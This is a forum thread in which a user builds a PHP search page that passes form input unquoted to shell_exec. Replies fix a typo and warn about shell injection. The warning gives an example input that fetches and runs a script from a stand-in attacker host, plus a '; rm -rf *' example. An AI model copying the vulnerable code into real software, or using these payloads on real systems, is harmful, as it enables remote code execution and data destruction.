Solved Shell script executed in HTML/PHP

gentoobob

gentoobob

I have some basic knowledge of HTML/PHP. The situation I am facing is frustrating. What I want to accomplish is to create a simple search box on a web page, when the user puts in input and clicks submit then my shell script is executed and then presented on a php page. I have been successful in getting other commands to run when I click submit to make sure the PHP exec shell command is working. I will see the output on the web page. Just not my script. My script uses an argument to pass and works thru command line. Below is the details of my script, HTML, and PHP page. Also, I'm using a FreeBSD 10 box. Thanks for any help in advance.

My Script

Command Line -
$ csearch "argument"

Code: 
#!/bin/sh
grep -ir -B 1 -A 4 "$*" /usr/local/var/rancid/CiscoDevices/configs

My HTML page

Code: 
<html>
<body>
<form method="POST" action="csearch.php">
    <input type="text" name="searchText">
    <input type="submit" value="Search">
</form>
</body>
</html>

My PHP page

Code: 
<?php
$searchText=$_POST['$searchText'];
?>

<html>
<?php

$output = shell_exec('/usr/local/bin/csearch $searchText');
echo "<pre>$output</pre>";

?>
</html>
 
I think your problem is this:
Code: 
$searchText=$_POST['$searchText'];

should be:
Code: 
$searchText=$_POST['searchText'];

And you might want the wrapper around the whole thing to be <html><body> ... </body></html> rather than just <html> ... </html>.
 
ljboiler said:
I think your problem is this:
Code: 
$searchText=$_POST['$searchText'];

should be:
Code: 
$searchText=$_POST['searchText'];

And you might want the wrapper around the whole thing to be <html><body> ... </body></html> rather than just <html> ... </html>.
Click to expand...


Right on! I can't believe I missed that. Thanks for the advice and help!
 
I hope you're not putting this up on the internet. The way the script is working right now opens it up to some very dangerous shellcode injection.
 
No, its just on an internal LAN for a small purpose. What's the dangerous part? I'm a bit ignorant on scripting so please let me know.
 
It's a shell injection attack. Perhaps a search text like this could be used and result in running the attacker's script on your server.
Code: 
searchtext_here; fetch http://www.badguy.com/evilscript.sh -o /tmp/evilscript.sh; sh /tmp/evilscript.sh
 
gentoobob said:
No, its just on an internal LAN for a small purpose. What's the dangerous part? I'm a bit ignorant on scripting so please let me know.
Click to expand...
The problem is that you pass $searchText to a shell without quoting, escaping or otherwise sanitizing it. That's means anyone can run arbitrary code on your server now e.g. simply by passing the search text ; rm -rf * your script would execute rm -rf * after csearch.

You can make $searchText safer to use with e.g. http://php.net/manual/en/function.escapeshellarg.php

Also see the Wikipedia article on Code Injection: https://en.wikipedia.org/wiki/Code_injection#Shell_injection
 
Oh I see. Okay. Well I will definitely see if I can get that to handle differently then. Thanks for prompting me on that. I'd never known!
 
You must log in or register to reply here.
Back
Top